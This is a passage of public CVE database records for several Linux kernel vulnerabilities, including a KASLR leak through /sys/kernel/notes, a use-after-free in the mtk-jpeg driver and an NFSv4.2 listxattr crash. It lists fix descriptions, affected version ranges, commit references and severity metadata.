"url": "https://git.kernel.org/stable/c/7447d911af699a15f8d050dfcb7c680a86f87012"
}
],
"title": "vfio/fsl-mc: Block calling interrupt handler without trigger",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26814",
"datePublished": "2024-04-05T08:24:43.916Z",
"dateReserved": "2024-02-19T14:20:24.180Z",
"dateUpdated": "2025-05-04T08:57:10.359Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26816 (GCVE-0-2024-26816)
Vulnerability from cvelistv5
Published
2024-04-10 13:53
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
x86, relocs: Ignore relocations in .notes section
When building with CONFIG_XEN_PV=y, .text symbols are emitted into
the .notes section so that Xen can find the "startup_xen" entry point.
This information is used prior to booting the kernel, so relocations
are not useful. In fact, performing relocations against the .notes
section means that the KASLR base is exposed since /sys/kernel/notes
is world-readable.
To avoid leaking the KASLR base without breaking unprivileged tools that
are expecting to read /sys/kernel/notes, skip performing relocations in
the .notes section. The values readable in .notes are then identical to
those found in System.map.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5ead97c84fa7d63a6a7a2f4e9f18f452bd109045 Version: 5ead97c84fa7d63a6a7a2f4e9f18f452bd109045 Version: 5ead97c84fa7d63a6a7a2f4e9f18f452bd109045 Version: 5ead97c84fa7d63a6a7a2f4e9f18f452bd109045 Version: 5ead97c84fa7d63a6a7a2f4e9f18f452bd109045 Version: 5ead97c84fa7d63a6a7a2f4e9f18f452bd109045 Version: 5ead97c84fa7d63a6a7a2f4e9f18f452bd109045 Version: 5ead97c84fa7d63a6a7a2f4e9f18f452bd109045 Version: 5ead97c84fa7d63a6a7a2f4e9f18f452bd109045 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26816",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T16:05:35.963352Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T16:05:55.498Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.600Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13edb509abc91c72152a11baaf0e7c060a312e03"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/52018aa146e3cf76569a9b1e6e49a2b7c8d4a088"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a4e7ff1a74274e59a2de9bb57236542aa990d20a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7cff9780297d55d97ad068b68b703cfe53ef9af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/47635b112a64b7b208224962471e7e42f110e723"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af2a9f98d884205145fd155304a6955822ccca1c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae7079238f6faf1b94accfccf334e98b46a0c0aa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5cb59db49c9c0fccfd33b2209af4f7ae3c6ddf40"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aaa8736370db1a78f0e8434344a484f9fd20be3b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/x86/tools/relocs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "13edb509abc91c72152a11baaf0e7c060a312e03",
"status": "affected",
"version": "5ead97c84fa7d63a6a7a2f4e9f18f452bd109045",
"versionType": "git"
},
{
"lessThan": "52018aa146e3cf76569a9b1e6e49a2b7c8d4a088",
"status": "affected",
"version": "5ead97c84fa7d63a6a7a2f4e9f18f452bd109045",
"versionType": "git"
},
{
"lessThan": "a4e7ff1a74274e59a2de9bb57236542aa990d20a",
"status": "affected",
"version": "5ead97c84fa7d63a6a7a2f4e9f18f452bd109045",
"versionType": "git"
},
{
"lessThan": "c7cff9780297d55d97ad068b68b703cfe53ef9af",
"status": "affected",
"version": "5ead97c84fa7d63a6a7a2f4e9f18f452bd109045",
"versionType": "git"
},
{
"lessThan": "47635b112a64b7b208224962471e7e42f110e723",
"status": "affected",
"version": "5ead97c84fa7d63a6a7a2f4e9f18f452bd109045",
"versionType": "git"
},
{
"lessThan": "af2a9f98d884205145fd155304a6955822ccca1c",
"status": "affected",
"version": "5ead97c84fa7d63a6a7a2f4e9f18f452bd109045",
"versionType": "git"
},
{
"lessThan": "ae7079238f6faf1b94accfccf334e98b46a0c0aa",
"status": "affected",
"version": "5ead97c84fa7d63a6a7a2f4e9f18f452bd109045",
"versionType": "git"
},
{
"lessThan": "5cb59db49c9c0fccfd33b2209af4f7ae3c6ddf40",
"status": "affected",
"version": "5ead97c84fa7d63a6a7a2f4e9f18f452bd109045",
"versionType": "git"
},
{
"lessThan": "aaa8736370db1a78f0e8434344a484f9fd20be3b",
"status": "affected",
"version": "5ead97c84fa7d63a6a7a2f4e9f18f452bd109045",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/x86/tools/relocs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.23"
},
{
"lessThan": "2.6.23",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "2.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.23",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86, relocs: Ignore relocations in .notes section\n\nWhen building with CONFIG_XEN_PV=y, .text symbols are emitted into\nthe .notes section so that Xen can find the \"startup_xen\" entry point.\nThis information is used prior to booting the kernel, so relocations\nare not useful. In fact, performing relocations against the .notes\nsection means that the KASLR base is exposed since /sys/kernel/notes\nis world-readable.\n\nTo avoid leaking the KASLR base without breaking unprivileged tools that\nare expecting to read /sys/kernel/notes, skip performing relocations in\nthe .notes section. The values readable in .notes are then identical to\nthose found in System.map."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:13.209Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/13edb509abc91c72152a11baaf0e7c060a312e03"
},
{
"url": "https://git.kernel.org/stable/c/52018aa146e3cf76569a9b1e6e49a2b7c8d4a088"
},
{
"url": "https://git.kernel.org/stable/c/a4e7ff1a74274e59a2de9bb57236542aa990d20a"
},
{
"url": "https://git.kernel.org/stable/c/c7cff9780297d55d97ad068b68b703cfe53ef9af"
},
{
"url": "https://git.kernel.org/stable/c/47635b112a64b7b208224962471e7e42f110e723"
},
{
"url": "https://git.kernel.org/stable/c/af2a9f98d884205145fd155304a6955822ccca1c"
},
{
"url": "https://git.kernel.org/stable/c/ae7079238f6faf1b94accfccf334e98b46a0c0aa"
},
{
"url": "https://git.kernel.org/stable/c/5cb59db49c9c0fccfd33b2209af4f7ae3c6ddf40"
},
{
"url": "https://git.kernel.org/stable/c/aaa8736370db1a78f0e8434344a484f9fd20be3b"
}
],
"title": "x86, relocs: Ignore relocations in .notes section",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26816",
"datePublished": "2024-04-10T13:53:49.492Z",
"dateReserved": "2024-02-19T14:20:24.180Z",
"dateUpdated": "2025-05-04T08:57:13.209Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52491 (GCVE-0-2023-52491)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: mtk-jpeg: Fix use after free bug due to error path handling in mtk_jpeg_dec_device_run
In mtk_jpeg_probe, &jpeg->job_timeout_work is bound with
mtk_jpeg_job_timeout_work.
In mtk_jpeg_dec_device_run, if error happens in
mtk_jpeg_set_dec_dst, it will finally start the worker while
mark the job as finished by invoking v4l2_m2m_job_finish.
There are two methods to trigger the bug. If we remove the
module, it which will call mtk_jpeg_remove to make cleanup.
The possible sequence is as follows, which will cause a
use-after-free bug.
CPU0 CPU1
mtk_jpeg_dec_... |
start worker |
|mtk_jpeg_job_timeout_work
mtk_jpeg_remove |
v4l2_m2m_release |
kfree(m2m_dev); |
|
| v4l2_m2m_get_curr_priv
| m2m_dev->curr_ctx //use
If we close the file descriptor, which will call mtk_jpeg_release,
it will have a similar sequence.
Fix this bug by starting timeout worker only if started jpegdec worker
successfully. Then v4l2_m2m_job_finish will only be called in
either mtk_jpeg_job_timeout_work or mtk_jpeg_dec_device_run.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b2f0d2724ba477d326e9d654d4db1c93e98f8b93 Version: b2f0d2724ba477d326e9d654d4db1c93e98f8b93 Version: b2f0d2724ba477d326e9d654d4db1c93e98f8b93 Version: b2f0d2724ba477d326e9d654d4db1c93e98f8b93 Version: b2f0d2724ba477d326e9d654d4db1c93e98f8b93 Version: b2f0d2724ba477d326e9d654d4db1c93e98f8b93 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.948Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/43872f44eee6c6781fea1348b38885d8e78face9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b1036c60a37a30caf6759a90fe5ecd06ec35590"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9fec4db7fff54d9b0306a332bab31eac47eeb5f6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8254d54d00eb6cdb8367399c7f912eb8d354ecd7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e2f37022f0fc0893da4d85a0500c9d547fffd4c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/206c857dd17d4d026de85866f1b5f0969f2a109e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52491",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-08T18:46:39.566289Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-08T18:47:11.526Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "43872f44eee6c6781fea1348b38885d8e78face9",
"status": "affected",
"version": "b2f0d2724ba477d326e9d654d4db1c93e98f8b93",
"versionType": "git"
},
{
"lessThan": "1b1036c60a37a30caf6759a90fe5ecd06ec35590",
"status": "affected",
"version": "b2f0d2724ba477d326e9d654d4db1c93e98f8b93",
"versionType": "git"
},
{
"lessThan": "9fec4db7fff54d9b0306a332bab31eac47eeb5f6",
"status": "affected",
"version": "b2f0d2724ba477d326e9d654d4db1c93e98f8b93",
"versionType": "git"
},
{
"lessThan": "8254d54d00eb6cdb8367399c7f912eb8d354ecd7",
"status": "affected",
"version": "b2f0d2724ba477d326e9d654d4db1c93e98f8b93",
"versionType": "git"
},
{
"lessThan": "6e2f37022f0fc0893da4d85a0500c9d547fffd4c",
"status": "affected",
"version": "b2f0d2724ba477d326e9d654d4db1c93e98f8b93",
"versionType": "git"
},
{
"lessThan": "206c857dd17d4d026de85866f1b5f0969f2a109e",
"status": "affected",
"version": "b2f0d2724ba477d326e9d654d4db1c93e98f8b93",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.12"
},
{
"lessThan": "4.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: mtk-jpeg: Fix use after free bug due to error path handling in mtk_jpeg_dec_device_run\n\nIn mtk_jpeg_probe, \u0026jpeg-\u003ejob_timeout_work is bound with\nmtk_jpeg_job_timeout_work.\n\nIn mtk_jpeg_dec_device_run, if error happens in\nmtk_jpeg_set_dec_dst, it will finally start the worker while\nmark the job as finished by invoking v4l2_m2m_job_finish.\n\nThere are two methods to trigger the bug. If we remove the\nmodule, it which will call mtk_jpeg_remove to make cleanup.\nThe possible sequence is as follows, which will cause a\nuse-after-free bug.\n\nCPU0 CPU1\nmtk_jpeg_dec_... |\n start worker\t |\n |mtk_jpeg_job_timeout_work\nmtk_jpeg_remove |\n v4l2_m2m_release |\n kfree(m2m_dev); |\n |\n | v4l2_m2m_get_curr_priv\n | m2m_dev-\u003ecurr_ctx //use\n\nIf we close the file descriptor, which will call mtk_jpeg_release,\nit will have a similar sequence.\n\nFix this bug by starting timeout worker only if started jpegdec worker\nsuccessfully. Then v4l2_m2m_job_finish will only be called in\neither mtk_jpeg_job_timeout_work or mtk_jpeg_dec_device_run."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:54.249Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/43872f44eee6c6781fea1348b38885d8e78face9"
},
{
"url": "https://git.kernel.org/stable/c/1b1036c60a37a30caf6759a90fe5ecd06ec35590"
},
{
"url": "https://git.kernel.org/stable/c/9fec4db7fff54d9b0306a332bab31eac47eeb5f6"
},
{
"url": "https://git.kernel.org/stable/c/8254d54d00eb6cdb8367399c7f912eb8d354ecd7"
},
{
"url": "https://git.kernel.org/stable/c/6e2f37022f0fc0893da4d85a0500c9d547fffd4c"
},
{
"url": "https://git.kernel.org/stable/c/206c857dd17d4d026de85866f1b5f0969f2a109e"
}
],
"title": "media: mtk-jpeg: Fix use after free bug due to error path handling in mtk_jpeg_dec_device_run",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52491",
"datePublished": "2024-02-29T15:52:09.891Z",
"dateReserved": "2024-02-20T12:30:33.303Z",
"dateUpdated": "2025-05-04T07:37:54.249Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26870 (GCVE-0-2024-26870)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
NFSv4.2: fix nfs4_listxattr kernel BUG at mm/usercopy.c:102
A call to listxattr() with a buffer size = 0 returns the actual
size of the buffer needed for a subsequent call. When size > 0,
nfs4_listxattr() does not return an error because either
generic_listxattr() or nfs4_listxattr_nfs4_label() consumes
exactly all the bytes then size is 0 when calling
nfs4_listxattr_nfs4_user() which then triggers the following
kernel BUG:
[ 99.403778] kernel BUG at mm/usercopy.c:102!
[ 99.404063] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP
[ 99.408463] CPU: 0 PID: 3310 Comm: python3 Not tainted 6.6.0-61.fc40.aarch64 #1
[ 99.415827] Call trace:
[ 99.415985] usercopy_abort+0x70/0xa0
[ 99.416227] __check_heap_object+0x134/0x158
[ 99.416505] check_heap_object+0x150/0x188
[ 99.416696] __check_object_size.part.0+0x78/0x168
[ 99.416886] __check_object_size+0x28/0x40
[ 99.417078] listxattr+0x8c/0x120
[ 99.417252] path_listxattr+0x78/0xe0
[ 99.417476] __arm64_sys_listxattr+0x28/0x40
[ 99.417723] invoke_syscall+0x78/0x100
[ 99.417929] el0_svc_common.constprop.0+0x48/0xf0
[ 99.418186] do_el0_svc+0x24/0x38
[ 99.418376] el0_svc+0x3c/0x110
[ 99.418554] el0t_64_sync_handler+0x120/0x130
[ 99.418788] el0t_64_sync+0x194/0x198
[ 99.418994] Code: aa0003e3 d000a3e0 91310000 97f49bdb (d4210000)
Issue is reproduced when generic_listxattr() returns 'system.nfs4_acl',
thus calling lisxattr() with size = 16 will trigger the bug.
Add check on nfs4_listxattr() to return ERANGE error when it is
called with size > 0 and the return value is greater than size.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 012a211abd5db098094ce429de5f046368391e68 Version: 012a211abd5db098094ce429de5f046368391e68 Version: 012a211abd5db098094ce429de5f046368391e68 Version: 012a211abd5db098094ce429de5f046368391e68 Version: 012a211abd5db098094ce429de5f046368391e68 Version: 012a211abd5db098094ce429de5f046368391e68 Version: 012a211abd5db098094ce429de5f046368391e68 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26870",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T19:56:13.503124Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:37.605Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:04.235Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4403438eaca6e91f02d272211c4d6b045092396b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d52865ff28245fc2134da9f99baff603a24407a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06e828b3f1b206de08ef520fc46a40b22e1869cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79cdcc765969d23f4e3d6ea115660c3333498768"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80365c9f96015bbf048fdd6c8705d3f8770132bf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/23bfecb4d852751d5e403557dd500bb563313baf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/251a658bbfceafb4d58c76b77682c8bf7bcfad65"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nfs/nfs4proc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4403438eaca6e91f02d272211c4d6b045092396b",
"status": "affected",
"version": "012a211abd5db098094ce429de5f046368391e68",
"versionType": "git"
},
{
"lessThan": "9d52865ff28245fc2134da9f99baff603a24407a",
"status": "affected",
"version": "012a211abd5db098094ce429de5f046368391e68",
"versionType": "git"
},
{
"lessThan": "06e828b3f1b206de08ef520fc46a40b22e1869cb",
"status": "affected",
"version": "012a211abd5db098094ce429de5f046368391e68",
"versionType": "git"
},
{
"lessThan": "79cdcc765969d23f4e3d6ea115660c3333498768",
"status": "affected",
"version": "012a211abd5db098094ce429de5f046368391e68",
"versionType": "git"
},
{
"lessThan": "80365c9f96015bbf048fdd6c8705d3f8770132bf",
"status": "affected",
"version": "012a211abd5db098094ce429de5f046368391e68",
"versionType": "git"
},
{
"lessThan": "23bfecb4d852751d5e403557dd500bb563313baf",
"status": "affected",
"version": "012a211abd5db098094ce429de5f046368391e68",
"versionType": "git"
},
{
"lessThan": "251a658bbfceafb4d58c76b77682c8bf7bcfad65",
"status": "affected",
"version": "012a211abd5db098094ce429de5f046368391e68",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nfs/nfs4proc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
